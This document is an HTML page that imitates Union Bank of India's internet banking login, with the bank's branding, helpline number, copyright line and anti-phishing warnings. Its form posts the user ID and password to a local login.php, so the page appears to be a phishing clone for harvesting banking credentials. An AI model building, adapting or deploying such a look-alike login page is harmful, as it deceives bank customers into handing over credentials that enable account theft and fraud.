<html>
    <head>
        <title>Union Login</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="login.css"/>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
       <script src="jquery.js"></script>
       <script type="text/javascript" src="jquery.ebcaptcha.js"></script>
        <link href="net.css" rel="stylesheet" type="text/css">
    </head>
    <body>
        <div class="header">
            <img src="Images/unionlogo.png">
           <div class="help">
               <p>All-India Toll Free Number</p><img src="Images/help.png">
               <div class="no"><span> 1800 22 22 44</span></div>
           </div>
        </div>
        <div class="net">
            <p>INTERNET BANKING LOGIN</p>
        </div>
        <div class="login"><img src="Images/logo1.png">
            <p>
      ALL YOUR BANKING FROM A SINGLE SECURE LOGIN 
    </p>
        </div>
        <br>


    
       <div class="box">
        
            <div class="captcha">


     <form action="login.php" method="POST">
    <label style="margin-left:40px;">USER ID</label><br><br>
    <input type="text" name="userid" style="margin-left:40px;height:30px;width:220px;border-radius:5px;border:none;"><br><br>
    <label style="margin-left:40px;" >PASSWORD</label><br><br>
    <input type="password" name="password" style="margin-left:40px;height:30px;width:220px;border-radius:5px;border:none;"><br><br>
      
    <input type="submit" value="submit">
    </form>
                
                
    


                <!-----
                <form method="post" id="form" action="/login.php">
                    <label style="color: whitesmoke;font-size: 12px;font-weight: bold;">USER ID<strong style="color: red;">*</strong></label>
                    <input type="text" name="" required=""><br><br>
                    <label style="color: whitesmoke;font-size: 12px;font-weight: bold;">Password<strong style="color: red;">*</strong></label>
                    <input type="text" name="" required=""><br><br>

                        <a href="e" style="color: rgb(175, 233, 230);font-weight: bold;font-size: 15px;text-decoration: none;">NEW USER?</a>
                    <br><br><br>
                <input type="submit">
                <label style="color: whitesmoke;margin-top: -125px;font-size: 12px;font-weight: bold;">VERIFICATION<strong style="color: red;">*</strong><img src="Images/reset.jpg"></label>
                </form>---->
                </div>
            
        </div>
    
        <div class="image">
            <img src="Images/digital2.jpg">
        </div>

        <div class="main">
            
           <h2> Customer Alert !!![Beware of phishing]</h2>


            <li> <i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                Do not respond to fraudulent communications asking your confidentials <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;like A/c No, User Id, Password, Card No,etc</li><br>
            <li><i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                Fraudulent e-mails contain links of look-alike websites to<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mislead into entering sensitive financial data</li><br>
            <li><i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                Bank will never send such communications to customers asking for<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; their personal or confidential information</li><br>
            <li><i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                Always visit Bank's site instead of clicking on the links<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;provided in emails or third party websites</li><br>
            <li><i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                Do not respond to pop-up windows asking for your confidential information</li>
            
        </div>

        <div class="right-main">  
             <h2>Services</h2>
                <li> <i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                    <a class="a1" href="#">Forgot/Reset Password</a>
                    </li><br>
                <li><i class="fa fa-caret-right" style="font-size:15px;color:red"></i>&nbsp;&nbsp;&nbsp;
                    <a class="a1" href="#">Mobile Banking Registration</a>
                    </li><br>
        </div>
        <br>


        <hr style="color: rgb(10, 119, 221);">
          
            <p>"Site best viewed at 1024x768 resolution in I.E. 9 or above, Google Chrome 40 or above, Firefox 37 or above, Safari 8 or above."<br>

                    Copyright © Union Bank of India - eBanking, All rights reserved </p>



                  
        
       <script type="text/javascript">

	    $(function(){
	        $('#form').ebcaptcha();
	    });

    </script>
    <script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-36251023-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
    </body>
</html